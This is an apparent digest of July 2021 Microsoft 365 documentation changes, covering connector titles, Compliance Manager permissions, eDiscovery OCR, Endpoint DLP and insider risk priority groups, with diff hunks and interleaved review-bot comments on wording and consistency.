Updates from: 07/16/2021 03:14:14
Category Microsoft Docs article Related commit history on GitHub Change details
admin Manage Groups https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/admin/create-groups/manage-groups.md
Go to the Microsoft 365 admin center at [https://admin.microsoft.com](https://ad
## Send copies of conversations to group members' inboxes
-When you use the admin center to create a group, by default users do not get copies of group emails and meeting invitations sent to their inboxes. They'll need to go to the group to see conversations and meetings. You can change this setting in the admin center.
+When you use the admin center to create a group, by default users do not get copies of group emails sent to their inboxes though users get copies of group meeting invitations sent to their inboxes. They'll need to go to the group to see conversations. You can change this setting in the admin center.
When you turn this setting on, group members will get a copy of group emails and meeting invitations sent to their Outlook Inbox. They can read and delete this copy of the email and not affect anyone else. In the Group inbox, a copy of the email still exists.
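Review bot: the rewritten default sentence now conflicts with the unchanged paragraph right after it. The new line says members already receive meeting invitations in their inboxes by default, yet the next paragraph still says that turning the setting on makes members "get a copy of group emails and meeting invitations"; if the setting only governs email copies, drop "and meeting invitations" from that sentence. The new line is also a run-on; something like "by default, members do not get copies of group emails in their inboxes, but they do get copies of group meeting invitations" reads more cleanly and keeps the same meaning.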
To confirm that the group has been successfully purged, run the *Get-AzureADMSD
[Upgrade distribution lists to Microsoft 365 groups](../manage/upgrade-distribution-lists.md)
-[Manage Microsoft 365 groups with PowerShell](../../enterprise/manage-microsoft-365-groups-with-powershell.md)
+[Manage Microsoft 365 groups with PowerShell](../../enterprise/manage-microsoft-365-groups-with-powershell.md)
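Review bot: the removed and added lines for the PowerShell link are identical as rendered, so this hunk is a whitespace-only or line-ending change. Confirm it is intentional (for example trailing-whitespace cleanup) rather than an accidental touch, since it adds diff noise without changing the page.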
compliance Archive 17A 4 Blackberry Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-blackberry-data.md
description: "Learn how to set up and use a 17a-4 BlackBerry DataParser connector to import and archive BlackBerry data in Microsoft 365."
-# Set up a connector to archive BlackBerry data (preview)
+# Set up a connector to archive BlackBerry data
Use the [BlackBerry DataParser](https://www.17a-4.com/BlackBerry-dataparser/) from 17a-4 LLC to import and archive BlackBerry enterprise data to user mailboxes in your Microsoft 365 organization. The DataParser includes a BlackBerry connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The BlackBerry DataParser connector converts BlackBerry data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Bloomberg Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-bloomberg-data.md
description: "Learn how to set up and use a 17a-4 Bloomberg DataParser connector to import and archive Bloomberg data in Microsoft 365."
-# Set up a connector to archive Bloomberg data (preview)
+# Set up a connector to archive Bloomberg data
Use the [Bloomberg DataParser](https://www.17a-4.com/Bloomberg-dataparser/) from 17a-4 LLC to import and archive data from Bloomberg to user mailboxes in your Microsoft 365 organization. The DataParser includes a Bloomberg connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The Bloomberg DataParser connector converts Bloomberg data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Cisco Jabber Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-cisco-jabber-data.md
description: "Learn how to set up and use a 17a-4 Cisco Jabber DataParser connector to import and archive Cisco Jabber data in Microsoft 365."
-# Set up a connector to archive Cisco Jabber data (preview)
+# Set up a connector to archive Cisco Jabber data
Use the [Cisco Jabber DataParser](https://www.17a-4.com/jabber-dataparser/) from 17a-4 LLC to import and archive data from Cisco Jabber to user mailboxes in your Microsoft 365 organization. The DataParser includes a Cisco Jabber connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The Cisco Jabber DataParser connector converts Cisco Jabber data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Factset Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-factset-data.md
description: "Learn how to set up and use a 17a-4 FactSet DataParser connector to import and archive FactSet data in Microsoft 365."
-# Set up a connector to archive FactSet data (preview)
+# Set up a connector to archive FactSet data
Use the [FactSet DataParser](https://www.17a-4.com/factset-dataparser/) from 17a-4 LLC to import and archive data from the FactSet platform to user mailboxes in your Microsoft 365 organization. The DataParser includes a FactSet connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The FactSet DataParser connector converts FactSet data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Fuze Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-fuze-data.md
description: "Learn how to set up and use a 17a-4 Fuze DataParser connector to import and archive Fuze data in Microsoft 365."
-# Set up a connector to archive Fuze data (preview)
+# Set up a connector to archive Fuze data
Use the [Fuze DataParser](https://www.17a-4.com/fuze-dataparser/) from 17a-4 LLC to import and archive data from Fuze to user mailboxes in your Microsoft 365 organization. The DataParser includes a Fuze connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The Fuze DataParser connector converts Fuze data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Fxconnect Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-fxconnect-data.md
description: "Learn how to set up and use a 17a-4 FX Connect DataParser connector to import and archive FX Connect data in Microsoft 365."
-# Set up a connector to archive FX Connect data (preview)
+# Set up a connector to archive data from FX Connect
Use the [FX Connect DataParser](https://www.17a-4.com/dataparser-roadmap/) from 17a-4 LLC to import and archive data from FX Connect to user mailboxes in your Microsoft 365 organization. The DataParser includes a FX Connect connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The FX Connect DataParser connector converts FX Connect data to an email message format and then imports those items to user mailboxes in Microsoft 365.
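Review bot: the new title "Set up a connector to archive data from FX Connect" breaks the "archive <product> data" pattern that the other 17a-4 connector titles in this batch keep after the "(preview)" removal; use "Set up a connector to archive FX Connect data" so the set stays consistent. Separately, the product link in the body points at the DataParser roadmap page (https://www.17a-4.com/dataparser-roadmap/) rather than a product-specific page like the sibling articles; confirm that is the intended destination.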
compliance Archive 17A 4 Ice Im Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-ice-im-data.md
description: "Learn how to set up and use a 17a-4 ICE Connect Chat DataParser connector to import and archive ICE Connect Chat data in Microsoft 365."
-# Set up a connector to archive ICE Connect Chat data (preview)
+# Set up a connector to archive ICE Connect Chat data
Use the [ICE DataParser](https://www.17a-4.com/ice-dataparser/) from 17a-4 LLC to import and archive data from ICE Connect Chat to user mailboxes in your Microsoft 365 organization. The DataParser includes an ICE Chat connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The ICE DataParser connector converts ICE Connect Chat data to an email message format and then imports those items to user mailboxes in Microsoft 365.
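Review bot: the body calls it "an ICE Chat connector" while the title, the description and the rest of the same paragraph say "ICE Connect Chat"; since the title is being edited anyway, settle on one product name for the connector in this paragraph.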
compliance Archive 17A 4 Investedge Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-investedge-data.md
description: "Learn how to set up and use a 17a-4 InvestEdge DataParser connector to import and archive InvestEdge data in Microsoft 365."
-# Set up a connector to archive InvestEdge data (preview)
+# Set up a connector to archive InvestEdge data
Use the [InvestEdge DataParser](https://www.17a-4.com/investedge-dataparser/) from 17a-4 LLC to import and archive data from InvestEdge to user mailboxes in your Microsoft 365 organization. The DataParser includes a InvestEdge connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The InvestEdge DataParser connector converts InvestEdge data to an email message format and then imports those items to user mailboxes in Microsoft 365.
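Review bot: "a InvestEdge connector" in the second sentence of the body should be "an InvestEdge connector"; fix the article in the same change as the title edit.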
compliance Archive 17A 4 Liveperson Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-liveperson-data.md
description: "Learn how to set up and use a 17a-4 LivePerson Conversational Cloud DataParser connector to import and archive LivePerson Conversational Cloud data in Microsoft 365."
-# Set up a connector to archive LivePerson Conversational Cloud data (preview)
+# Set up a connector to archive LivePerson Conversational Cloud data
Use the [LivePerson Conversational Cloud DataParser](https://www.17a-4.com/liveperson-dataparser/) from 17a-4 LLC to import and archive data from LivePerson Conversational Cloud to user mailboxes in your Microsoft 365 organization. The DataParser includes a LivePerson Conversational Cloud connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The LivePerson Conversational Cloud DataParser connector converts data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Quip Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-quip-data.md
description: "Learn how to set up and use a 17a-4 Quip DataParser connector to import and archive Quip data in Microsoft 365."
-# Set up a connector to archive Quip data (preview)
+# Set up a connector to archive Quip data
Use the [Quip DataParser](https://www.17a-4.com/quip-dataparser/) from 17a-4 LLC to import and archive data from Quip to user mailboxes in your Microsoft 365 organization. The DataParser includes a Quip connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The Quip DataParser connector converts Quip data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Refinitiv Messenger Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-refinitiv-messenger-data.md
description: "Learn how to set up and use a 17a-4 Refinitiv Eikon Messenger DataParser connector to import and archive Refinitiv Eikon Messenger data in Microsoft 365."
-# Set up a connector to archive Refinitiv Eikon Messenger data (preview)
+# Set up a connector to archive Refinitiv Eikon Messenger data
Use the [Refinitiv Eikon Messenger DataParser](https://www.17a-4.com/refinitiv-messenger-dataparser/) from 17a-4 LLC to import and archive data from Refinitiv Eikon Messenger to user mailboxes in your Microsoft 365 organization. The DataParser includes a Refinitiv Eikon Messenger connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The Refinitiv Eikon Messenger DataParser connector converts Refinitiv Eikon Messenger data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Servicenow Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-servicenow-data.md
description: "Learn how to set up and use a 17a-4 ServiceNow DataParser connector to import and archive ServiceNow data in Microsoft 365."
-# Set up a connector to archive ServiceNow data (preview)
+# Set up a connector to archive data from ServiceNow
Use the [ServiceNow DataParser](https://www.17a-4.com/dataparser/) from 17a-4 LLC to import and archive data from ServiceNow to user mailboxes in your Microsoft 365 organization. The DataParser includes a ServiceNow connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The ServiceNow DataParser connector converts ServiceNow data to an email message format and then imports those items to user mailboxes in Microsoft 365.
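Review bot: the new title "Set up a connector to archive data from ServiceNow" departs from the "archive <product> data" wording used by the rest of the 17a-4 connector titles in this batch; use "Set up a connector to archive ServiceNow data". Also, the body link goes to the generic https://www.17a-4.com/dataparser/ page rather than a ServiceNow-specific page like the other connectors; confirm there is no product page to link to.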
compliance Archive 17A 4 Slack Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-slack-data.md
description: "Learn how to set up and use a 17a-4 Slack DataParser connector to import and archive Slack data in Microsoft 365."
-# Set up a connector to archive Slack data (preview)
+# Set up a connector to archive Slack data
Use [DataParser from 17a-4 LLC](https://www.17a-4.com/slack-dataparser/) to import and archive data from the Slack platform to user mailboxes in your Microsoft 365 organization. DataParser includes a Slack connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The Slack DataParser connector converts Slack data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Sql Database Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-sql-database-data.md
description: "Learn how to set up and use a 17a-4 SQL DataParser connector to import and archive SQL data in Microsoft 365."
-# Set up a connector to archive SQL data (preview)
+# Set up a connector to archive SQL data
Use the [SQL DataParser](https://www.17a-4.com/sql-dataparser/) from 17a-4 LLC to import and archive data from a SQL database to user mailboxes in your Microsoft 365 organization. The DataParser includes a SQL connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The SQL DataParser connector converts SQL data to an email message format and then imports those items to user mailboxes in Microsoft 365.
compliance Archive 17A 4 Symphony Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-symphony-data.md
description: "Learn how to set up and use a 17a-4 Symphony DataParser connector to import and archive Symphony data in Microsoft 365."
-# Set up a connector to archive Symphony data (preview)
+# Set up a connector to archive data from Symphony
Use the [Symphony DataParser](https://www.17a-4.com/Symphony-dataparser/) from 17a-4 LLC to import and archive Symphony communications data to user mailboxes in your Microsoft 365 organization. The DataParser includes a Symphony connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The Symphony DataParser connector converts Symphony data to an email message format and then imports those items to user mailboxes in Microsoft 365.
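Review bot: the new title "Set up a connector to archive data from Symphony" is inconsistent with the "archive <product> data" form kept by the other 17a-4 connector titles in this batch; use "Set up a connector to archive Symphony data" (the body already says "archive Symphony communications data").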
compliance Archive 17A 4 Webex Teams Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-webex-teams-data.md
description: "Learn how to set up and use a 17a-4 Cisco Webex DataParser connector to import and archive Cisco Webex data in Microsoft 365."
-# Set up a connector to archive Cisco Webex data (preview)
+# Set up a connector to archive Cisco Webex data
Use the [Cisco Webex DataParser](https://www.17a-4.com/webex-dataparser/) from 17a-4 LLC to import and archive data from the Cisco Cisco Webex platform to user mailboxes in your Microsoft 365 organization. The DataParser includes a Cisco Webex connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The Cisco Webex DataParser connector converts Cisco Webex data to an email message format and then imports those items to user mailboxes in Microsoft 365.
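Review bot: the body's first sentence reads "data from the Cisco Cisco Webex platform", a duplicated word; fix it to "the Cisco Webex platform" while the title is being edited.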
compliance Archive 17A 4 Zoom Data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-17a-4-zoom-data.md
description: "Learn how to set up and use a 17a-4 Zoom DataParser connector to import and archive Zoom data in Microsoft 365."
-# Set up a connector to archive Zoom data (preview)
+# Set up a connector to archive Zoom data
Use the [Zoom DataParser](https://www.17a-4.com/dataparser/) from 17a-4 LLC to import and archive data from the Zoom platform to user mailboxes in your Microsoft 365 organization. The DataParser includes a Zoom connector that's configured to capture items from a third-party data source and import those items to Microsoft 365. The Zoom DataParser connector converts Zoom data to an email message format and then imports those items to user mailboxes in Microsoft 365.
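Review bot: the Zoom body links to the generic https://www.17a-4.com/dataparser/ page while the other connector articles link to product-specific DataParser pages; confirm that a Zoom page does not exist before leaving the generic link in place.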
compliance Archive Data From Celltrustsl2 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/archive-data-from-celltrustsl2.md
description: "Learn how to set up and use a CellTrust SL2 data connector to impo
-# Archive data from CellTrust SL2 to Microsoft 365 (preview)
+# Archive data from CellTrust SL2 to Microsoft 365
CellTrust SL2 captures mobile communications data and integrates with the leading archiving technologies to meet the electronic discovery requirements for regulations such as FINRA, HIPAA, FOIA, and TCPA. The SL2 Data Connector imports mobile communication items to Microsoft 365. This article describes the process for integrating SL2 with Microsoft 365 by using the CellTrust SL2 Data Connector for archiving. Completing this process assumes that you have subscribed to CellTrust SL2 service and are familiar with the SL2 architecture. For information about SL2, see <www.celltrust.com>.
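Review bot: the closing "see <www.celltrust.com>" in the body is not a valid autolink: CommonMark autolinks require a scheme inside the angle brackets, so this renders as literal text (or is dropped as a malformed tag) rather than a link. Use `[www.celltrust.com](https://www.celltrust.com)` or a bare `https://www.celltrust.com`. Also note that "FOIA" and "TCPA" are listed alongside FINRA and HIPAA as regulations; that is the vendor's framing, fine as is, but the sentence "Completing this process assumes that you have subscribed to CellTrust SL2 service" should read "to the CellTrust SL2 service".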
compliance Compliance Manager Setup https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/compliance-manager-setup.md
Compliance Manager uses a role-based access control (RBAC) permission model. Onl
### Where to set permissions
-The person holding the global admin role for your organization can set user permissions for Compliance Manager. Permissions can be set in the Office 365 Security & Compliance center as well as in Azure Active Directory (Azure AD).
+The person holding the global admin role for your organization can set user permissions for Compliance Manager. Permissions can be set in the Microsoft 365 compliance center as well as in Azure Active Directory (Azure AD).
> [!NOTE] > Customers in US Government Community (GCC) High and Department of Defense (DoD) environments can only set user permissions and roles for Compliance Manager in Azure AD. See below for Azure AD instructions and role type definitions.
-To set permissions and assign roles in the Office 365 Security & Compliance center, follow the steps below:
+To set permissions and assign roles in the Microsoft 365 compliance center, follow the steps below:
-1. Go to the [Office 365 Security & Compliance Center](https://protection.office.com/) and select **Permissions** on the left navigation.
+1. Go to the [Microsoft 365 compliance center](https://compliance.microsoft.com/compliancemanager) and select **Permissions** on the left navigation.
-2. Find the role group to which you want to add one or more users, and check the box to the left of the group name. (See the [list of roles and related functions below](#role-types). The role group names mimic the role name.)
+2. Under the **Compliance center** dropdown, select **Roles**.
-3. On the flyout pane for that group, select **Edit** under the **Members** header.
+3. Find the role group to which you want to add one or more users, and check the box to the left of the group name. (See the [list of roles and related functions below](#role-types). The role group names mimic the role name.)
-4. Select **Choose members**. Another flyout window will appear.
+4. On the flyout pane for that group, select **Edit** under the **Members** header.
-5. Select **+ Add** to choose one or more users to add to the group.
+5. Select **Choose members**. Another flyout window will appear.
-6. Select the checkbox next to the names you want to add, then select the **Add** button at the bottom.
+6. Select **+ Add** to choose one or more users to add to the group.
-7. When youΓÇÖre done assigning users, select **Done**, then select **Save**, then **Close**.
+7. Select the checkbox next to the names you want to add, then select the **Add** button at the bottom.
-##### More about the Office 365 Security & Compliance Center
+8. When youΓÇÖre done assigning users, select **Done**, then select **Save**, then **Close**.
-Learn more about [permissions in the Office 365 Security & Compliance Center](../security/office-365-security/permissions-in-the-security-and-compliance-center.md).
-
-If you don't have access to the Office 365 Security and Compliance Center, or if you need to access the classic version of Compliance Manager in the Microsoft Service Trust Portal, the Admin settings in the Service Trust Portal provides another way to assign roles ([view instructions](meet-data-protection-and-regulatory-reqs-using-microsoft-cloud.md#assigning-compliance-manager-roles-to-users)). Be aware that such roles are more limited in their functionality.
+If you need to access the classic version of Compliance Manager in the Microsoft Service Trust Portal, the Admin settings in the Service Trust Portal provides another way to assign roles ([view instructions](meet-data-protection-and-regulatory-reqs-using-microsoft-cloud.md#assigning-compliance-manager-roles-to-users)). Be aware that such roles are more limited in their functionality.
##### More about Azure AD
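Review bot: the hunk deletes the "More about the Office 365 Security & Compliance Center" subsection and with it the link to the permissions reference, but the renumbered steps still tell the admin to pick role groups by name; keep a link to the permissions article under the compliance center name rather than dropping it, since that is where the role groups are defined. Minor: the new step 1 deep-links to https://compliance.microsoft.com/compliancemanager and then asks the reader to select **Permissions** in the left navigation; either link to the permissions page directly or keep the link to Compliance Manager and leave the navigation instruction as written, but not a Compliance Manager deep link with a permissions instruction that reads as if the page were already open.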
You can reassign improvement actions from one user to another. When you reassign
8. When the reassignment is complete, youΓÇÖll see a confirmation message in the flyout pane confirming that all improvement actions from the previous user have been reassigned to the new user. If you receive a reassignment failure notice, close the window and try again. To close the flyout pane, select **Done**. The new assignee receives an email that they've been assigned to an improvement action. The email contains a direct link into the improvement action's details page.
-
+ > [!NOTE] > If you reassign an action that has a pending update, the direct link to the action in the reassignment email will break if the update is accepted after reassignment. You can fix this by re-assigning the action to the user after the update is accepted. Learn more about [updates to improvement actions](compliance-manager-improvement-actions.md#accepting-updates-to-improvement-actions).
To delete a userΓÇÖs history, follow the steps below:
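Review bot: the new NOTE's workaround sentence is ambiguous: "re-assigning the action to the user after the update is accepted" should say "to the same user" so it is clear the fix is to repeat the reassignment, not to pick someone else. The note also mixes "reassign"/"reassignment" (step 8) with "re-assigning"; use one spelling. Finally, the note text is indented by one space and begins "> [!NOTE] >" on the same line; make sure the source has the callout marker on its own line so the alert renders.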
The Compliance Manager dashboard is designed to provide you an at-a-glance view of your current compliance posture.
-![Compliance Manager - dashboard](../media/compliance-manager-dashboard.png "Compliance Manager dashboard")
### Overall compliance score
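Review bot: the dashboard screenshot is removed with nothing added in its place, so the "at-a-glance view" sentence is now the only description of the dashboard before the score subsections; if the image is outdated, replace it with a current capture or a sentence naming the dashboard elements, and confirm ../media/compliance-manager-dashboard.png is not referenced from another page before deleting the file.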
compliance Configure Search And Analytics Settings In Advanced Ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/configure-search-and-analytics-settings-in-advanced-ediscovery.md
This query basically filters out duplicate items from the review set. This lets
## Ignore text
-There are situations where certain text will diminish the quality of analytics, such as lengthy disclaimers that get added to email messages regardless of the content of the email. If you know of text that should be ignored, you can exclude it from analytics by specifying the text string and the analytics functionality (Near-duplicates, Email threading, Themes, and Relevance) that the text should be excluded for. Using regular expressions (RegEx) as ignored text is also supported.
+There are situations where certain text will diminish the quality of analytics, such as lengthy disclaimers that get added to email messages regardless of the content of the email. If you know of text that should be ignored, you can exclude it from analytics by specifying the text string and the analytics functionality (Near-duplicates, Email threading, Themes, and Relevance) that the text should be excluded for. Using regular expressions (RegEx) as ignored text is also supported.
## Optical character recognition (OCR) When this setting is turned on, OCR processing will be run on image files. OCR processing is run in the following situations: -- When custodians and [non-custodial data sources](non-custodial-data-sources.md) are added to a case. OCR processing is performed during the [Advanced indexing](indexing-custodian-data.md) process. OCR is only run on items that are processed during Advanced indexing. For example, if a large PDF file that is partially indexed or had other indexing errors is processed during Advanced indexing, the file will also have OCR applied. In other words, OCR processing only occurs on files that are re-indexed during the Advanced indexing process. This means are will situations that when custodians are added to a case, some email attachments won't be processed for OCR because those files are not processed during Advanced indexing. When OCR is applied image files, the text in those image files will be searchable during a collection.
+- When custodians and [non-custodial data sources](non-custodial-data-sources.md) are added to a case. When OCR is applied to image files, the text in those files will be searchable during a collection. OCR processing is performed during the [Advanced indexing](indexing-custodian-data.md) process. OCR is only run on items that are processed during Advanced indexing. For example, if a large PDF file that is partially indexed or had other indexing errors is processed during Advanced indexing, the file will also have OCR applied. In other words, OCR processing only occurs on files that are re-indexed during the Advanced indexing process. This means there may be situations where custodians are added to a case but some email attachments won't be processed for OCR because those files are not processed during Advanced indexing.
- When content from other data sources (that aren't associated with a custodian and added to the case in a non-custodial data source) is added to a review set.
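Review bot: the rewritten OCR bullet fixes the garbled "This means are will situations" sentence, but it still states the same rule twice: "OCR is only run on items that are processed during Advanced indexing" and, three sentences later, "In other words, OCR processing only occurs on files that are re-indexed during the Advanced indexing process"; drop the "In other words" restatement. Also, the "Ignore text" pair above is identical as rendered, so that part of the hunk is a whitespace-only change; confirm it is intended.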
compliance Endpoint Dlp Learn About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/endpoint-dlp-learn-about.md
Microsoft Endpoint DLP enables you to audit and manage the following types of ac
## Monitored files
-Endpoint DLP supports monitoring of these file types:
+Endpoint DLP supports monitoring of these file types. DLP audits the activities for these file types, even if there isn't a policy match.
- Word files - PowerPoint files
Endpoint DLP supports monitoring of these file types:
- .cs files - .h files - .java files
+
+If you only want monitoring data from policy matches, you can turn off the **Always audit file activity for devices** in the endpoint DLP global settings.
-By default, endpoint DLP audits the activities for these file types, even if there isn't a policy match. If you only want monitoring data from policy matches, you can turn off the **Always audit file activity for devices** in the endpoint DLP global settings. If this setting is on, activities on any Word, PowerPoint, Excel, PDF, and .csv file are always audited even if the device is not targeted by any policy.
+> [!NOTE]
+> If the **Always audit file activity for devices** setting is on, activities on any Word, PowerPoint, Excel, PDF, and .csv file are always audited even if the device is not targeted by any policy.
Endpoint DLP monitors activity-based on MIME type, so activities will be captured even if the file extension is changed.
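Review bot: the new opening sentence "DLP audits the activities for these file types, even if there isn't a policy match" states the behaviour as unconditional, while the new NOTE below makes it depend on the **Always audit file activity for devices** setting; the removed line had "By default," which made that clear, so restore it ("By default, DLP audits ..."). The two statements also disagree on scope: the opening sentence applies to every monitored type in the list, including source files such as .cs, .h and .java, but the NOTE says only Word, PowerPoint, Excel, PDF and .csv are always audited; confirm which set is correct and say the same thing in both places, since an auditor reading this will size their log coverage from it.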
compliance Insider Risk Management Settings https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/insider-risk-management-settings.md
Users in your organization may have different levels of risk depending on their
![Insider risk management priority user group settings](../media/insider-risk-settings-priority-users.png)
-For example, you need to protect against data leaks for a highly confidential project where users have access to sensitive information. You choose to create *Confidential Project* *Users* priority user group for users in your organization that work on this project. Using the policy wizard and the *Data leaks by priority users* policy template, you create a new policy and assign the *Confidential Project Users* priority users group to the policy. Activities examined by the policy for members of the *Confidential Project Users* priority user group are more sensitive to risk and activities by these users will be more likely to generate an alert and have alerts with higher severity levels.
+Instead of being open to review by all analysts and investigators, Priority users groups may also need to restrict review activities to specific users or insider risk role groups. You can choose to assign individual users and role groups to review users, alerts, cases, and reports for each priority user group. Priority user groups can have review permissions assigned to the built-in *Insider Risk Management*, *Insider Risk Management Analysts*, and *Insider Risk Management Investigators* role groups, one or more of these role groups, or to a custom selection of users.
+
+For example, you need to protect against data leaks for a highly confidential project where users have access to sensitive information. You choose to create *Confidential Project* *Users* priority user group for users in your organization that work on this project. Additionally, this priority user group should not have users, alerts, cases, and reports associated with group visible to all the default insider risk management admins, analysts, and investigators. In **Settings**, you create the *Confidential Project Users* priority users group and assign two users as reviewer that can view data related to the groups. Using the policy wizard and the *Data leaks by priority users* policy template, you create a new policy and assign the *Confidential Project Users* priority users group to the policy. Activities examined by the policy for members of the *Confidential Project Users* priority user group are more sensitive to risk and activities by these users will be more likely to generate an alert and have alerts with higher severity levels.
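Review bot: the new paragraph on reviewer scoping has a redundant clause: "assigned to the built-in ... role groups, one or more of these role groups, or to a custom selection of users" says the same thing twice; shorten to "to one or more of the built-in ... role groups, or to a custom selection of users". Fix the capitalisation of "Priority users groups" (should be "priority user groups") in the first sentence. In the example paragraph, "associated with group visible" needs "the group", "assign two users as reviewer" should be "as reviewers", and "data related to the groups" should be "the group". It would also help to state the consequence of the setting in one sentence: users and role groups not assigned to the group cannot see its users, alerts, cases or reports, which is the least-privilege point the feature exists for.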
### Create a priority user group
To create a new priority user group, you'll use setting controls in the **Inside
Complete the following steps to create a priority user group: 1. In the [Microsoft 365 compliance center](https://compliance.microsoft.com), go to **Insider risk management** and select **Insider risk settings**.
-2. Select the **Priority user groups** tab
-3. On the **Priority user groups** tab, select **Create priority user group** to start the group creation wizard.
-4. On the **Define group** page, complete the following fields:
+2. Select the **Priority user groups (preview)** tab.
+3. On the **Priority user groups (preview)** tab, select **Create priority user group** to start the group creation wizard.
+4. On the **Name and describe** page, complete the following fields:
- **Name (required)**: Enter a friendly name for the priority user group. You can't change the name of the priority user group after you complete the wizard. - **Description (optional)**: Enter a description for the priority user group. 5. Select **Next** to continue. 6. On the **Choose members** page, select **Choose members** to search and select which mail-enabled user accounts are included in the group or select the **Select all** checkbox to add all users in your organization to the group. Select **Add** to continue or **Cancel** to close without adding any users to the group. 7. Select **Next** to continue.
-8. On the **Review** page, review the settings you've chosen for the priority user group. Select **Edit** to change any of the group values or select **Submit** to create and activate the priority user group.
-9. On the confirmation page, select **Done** to exit the wizard.
+8. On the **Choose who can view this group** page, you must define who can review users, alerts, cases, and reports for the priority user group. At least one user or insider risk management role group must be assigned. Select **Choose users and role groups** and select the users or insider risk management role groups you want to assign to the priority user group. Select **Add** to assign the selected users or role groups to the group.
+9. Select Next to continue.
+10. On the **Review** page, review the settings you've chosen for the priority user group. Select the **Edit** links to change any of the group values or select **Submit** to create and activate the priority user group.
+11. On the confirmation page, select **Done** to exit the wizard.
### Update a priority user group
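Review bot: step 9 ("Select Next to continue.") drops the bold on **Next** that steps 5 and 7 use. Step 8 carries the only access-control constraint in the procedure, that at least one user or insider risk management role group must be assigned as a reviewer; since this page is where visibility of the group's users, alerts, cases and reports is decided, step 8 should also say that the default role groups do not see this group unless they are added here, which is what the example paragraph earlier in the article implies but never states in the steps.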
To update an existing priority user group, you'll use setting controls in the **
Complete the following steps to edit a priority user group: 1. In the [Microsoft 365 compliance center](https://compliance.microsoft.com), go to **Insider risk management** and select **Insider risk settings**.
-2. Select the **Priority user groups** tab
+2. Select the **Priority user groups (preview)** tab.
3. Select the priority user group you want to edit and select **Edit group**.
-4. On the **Define group** page, update the Description field if needed. You can't update the name of the priority user group. Select **Next** to continue.
+4. On the **Name and describe** page, update the Description field if needed. You can't update the name of the priority user group. Select **Next** to continue.
5. On the **Choose members** page, add new members to the group using the **Choose members** control. To remove a user from the group, select the 'X' next to the user you wish to remove. Select **Next** to continue.
-6. On the **Review** page, review the update settings you've chosen for the priority user group. Select **Edit** to change any of the group values or select **Submit** to update the priority user group.
-7. On the confirmation page, select **Done** to exit the wizard.
+6. On the **Choose who can view this group** page, add or remove users or role groups that can review users, alerts, cases, and reports for the priority user group.
+7. Select **Next** to continue.
+8. On the **Review** page, review the update settings you've chosen for the priority user group. Select the **Edit** links to change any of the group values or select **Submit** to update the priority user group.
+9. On the confirmation page, select **Done** to exit the wizard.
### Delete a priority user group
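Review bot: step 6 of the update procedure lets you add or remove reviewers but, unlike step 8 of the create procedure, does not restate that at least one user or role group must remain assigned, nor that you select **Add** after choosing; mirror the create-flow wording so an admin does not remove the last reviewer and lock everyone out of the group's alerts and cases.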
To delete an existing priority user group, you'll use setting controls in the **
Complete the following steps to delete a priority user group: 1. In the [Microsoft 365 compliance center](https://compliance.microsoft.com), go to **Insider risk management** and select **Insider risk settings**.
-2. Select the **Priority user groups** tab
+2. Select the **Priority user groups (preview)** tab.
